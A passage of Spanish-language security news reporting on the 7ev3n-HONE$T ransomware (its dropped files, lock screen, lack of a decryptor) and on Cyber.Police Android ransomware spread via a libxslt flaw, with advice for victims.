  • C:\Users\Public\files – La lista con todos los archivos secuestrados.
  • C:\Users\Public\FILES_BACK.txt – Un método alternativo para contactar con el desarrollador del ransomware.
  • C:\Users\Public\testdecrypt – Una pequeña lista de archivos que se pueden descifrar de forma gratuita.
  • C:\Users\Public\time.e – Una marca de tiempo de cuándo se han cifrado los archivos.
La pantalla de bloqueo de este ransomware consta de 4 partes.

  • la primera de ellas muestra la información sobre el secuestro, 
  • la segunda de ellas muestra una lista con todos los archivos cifrados, 
  • la tercera de ellas una serie de instrucciones para realizar el pago 
  • y la cuarta busca convencer a los usuarios de que paguen el rescate, ya que este ransomware permite recuperar de 3 a 5 archivos de forma totalmente gratuita demostrando así que, si se paga, la recuperación es posible.
El ransomware 7ev3n-HONE$T aún no ha sido crackeado,
  • Por desgracia, aunque existen muchas herramientas para recuperar los datos cifrados por diferentes variantes de ransomware, a día de hoy, los datos cifrados por 7ev3n-HONE$T no se pueden recuperar de forma gratuita (y aunque paguemos el rescate, la recuperación de los datos no está asegurada), por lo que si caemos víctima de este malware lo más recomendable es esperar a ver si, finalmente, se publica una herramienta para recuperar estos archivos o darlos por perdidos, antes de correr el riesgo de perder también cerca de 400 euros por una clave privada que no terminará de llegar.
  • Por el momento, los investigadores de seguridad siguen estudiando este nuevo ransomware con el fin de descubrir más información sobre quién está detrás de él (de momento solo se conoce que es de origen turco) y poder encontrar un fallo que permita su recuperación, sin embargo, a día de hoy no se sabe nada más, por lo que habrá que esperar.
Fuente: Bleeping Computer

ANDROID. El ransomware puede llegar a la plataforma sin que el usuario se percate

La cantidad de amenazas disponibles para Android cada vez es mayor y una prueba de ello es el último ataque llevado a cabo por ciberdelincuentes utilizando páginas web con código malicioso. Esto puede permitir que un ransomware llegue al dispositivo sin que el usuario sea consciente de lo que sucede.
Estos se valen de un código JavaScript que se combina con una vulnerabilidad existente en algunas versiones del sistema operativo, sobre todo aquellas más antiguas. Concretamente es la librería libxslt de la que se valen para lograr privilegios de administrador y de esta forma conseguir que la amenaza se instale de forma correcta en el dispositivo sin la necesidad de que el usuario tenga que interactuar o conceder los permisos.
Una vez que estos permisos están garantizados comienza la descarga del .apk que será el que instale en el terminal o tableta la amenaza conocida como Cyber.Police, permitiendo su instalación sin la necesidad de desplegar ningún tipo de pop-up para solicitar permisos de instalación ni de ejecución.
El ransomware Cyber.Police solicita la compra de tarjetas regalo
  • Esta amenaza no lleva a cabo el bloqueo de los archivo pero sí el de la pantalla del terminal, provocando que el usuario no pueda utilizarlo con normalidad y dando la opción de adquirir dos tarjetas regalo de la Apple Store valoradas en 100 dólares. Realizando la compra de estas se debería llevar a cabo el desbloqueo de forma automática del terminal. 
  • El problema es que la compra de estos artículos no tiene porqué ser legítima, pudiendo ser todo una estafa para que el usuario pague la cantidad solicitada, de ahí que se aconseje realizar un wipe de la memoria del dispositivo.
Versiones afectadas
  • Aunque no se sabe a ciencia cierta las versiones están afectadas por el problema (algo que suele ser habitual en este tipo de situaciones) los expertos en seguridad han querido realizar una aproximación y todo parece indicar que son los dispositivos con versiones entre la 4.0.3 y 4.4.4 los que a día de hoy estarían en riesgo.
  • Si en algún momento te ves afectado la mejor solución es restablecer el dispositivo y antes de perder todos los datos, lo que sí se puede hacer es conectar el dispositivo al PC y hacer una copia de seguridad.
Fuente: Softpedia